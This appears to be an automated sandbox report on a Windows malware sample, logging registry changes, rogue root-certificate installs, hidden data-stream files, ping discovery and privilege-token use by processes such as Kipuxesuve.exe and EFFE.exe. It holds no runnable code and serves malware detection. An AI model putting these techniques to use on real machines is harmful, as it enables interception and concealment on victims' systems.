Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{4C55CA11-E095-4067-A689-1668F64A5A1B} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 83cacbb27e38d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6713e0d68038d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "4432"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000971bd0d7ff67cf12d1de51176866b9158f0b66312368a6a95c6e426fa807c7a2be37df0c84b394cb3f1caa37410960ad645b9824668b4a497638	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{B60562E6-8AD3-4C6E-B235-CFCABCE0FEB5}"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f048ccbf7e38d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b7f818b27e38d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Kipuxesuve.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Kipuxesuve.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	EFFE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	EFFE.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\ProgramData:ApplicationData	FE97.exe
File opened for modification	C:\ProgramData:ApplicationData	FE97.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5496	PING.EXE
4784	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3644	ultramediaburner.tmp
3644	ultramediaburner.tmp
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe
2808	Cowaewishyca.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
8	Process not Found

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
4800	MicrosoftEdgeCP.exe
4800	MicrosoftEdgeCP.exe
5368	Process not Found
6044	c7ae36fa.exe
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
5732	explorer.exe
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
4548	explorer.exe
4548	explorer.exe
4548	explorer.exe
4548	explorer.exe
4548	explorer.exe
4548	explorer.exe
4548	explorer.exe
4548	explorer.exe
8	Process not Found
8	Process not Found
8	Process not Found
8	Process not Found
6028	explorer.exe
6028	explorer.exe
6028	explorer.exe
6028	explorer.exe
6028	explorer.exe
6028	explorer.exe
6028	explorer.exe
6028	explorer.exe
8	Process not Found
8	Process not Found
6076	hdacjsh
5320	euacjsh
5732	explorer.exe
5732	explorer.exe
6028	explorer.exe
6028	explorer.exe
4548	explorer.exe
4548	explorer.exe
4800	MicrosoftEdgeCP.exe
4800	MicrosoftEdgeCP.exe
5732	explorer.exe
5732	explorer.exe
6028	explorer.exe
6028	explorer.exe
4548	explorer.exe
4548	explorer.exe
5308	hdacjsh
1700	euacjsh

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3264	Ultra.exe
Token: SeDebugPrivilege	1032	Kipuxesuve.exe
Token: SeDebugPrivilege	2808	Cowaewishyca.exe
Token: SeDebugPrivilege	764	MicrosoftEdge.exe
Token: SeDebugPrivilege	764	MicrosoftEdge.exe
Token: SeDebugPrivilege	764	MicrosoftEdge.exe
Token: SeDebugPrivilege	764	MicrosoftEdge.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4292	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeTcbPrivilege	1048	svchost.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeAuditPrivilege	2332	svchost.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeAuditPrivilege	2332	svchost.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeDebugPrivilege	4732	rundll32.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
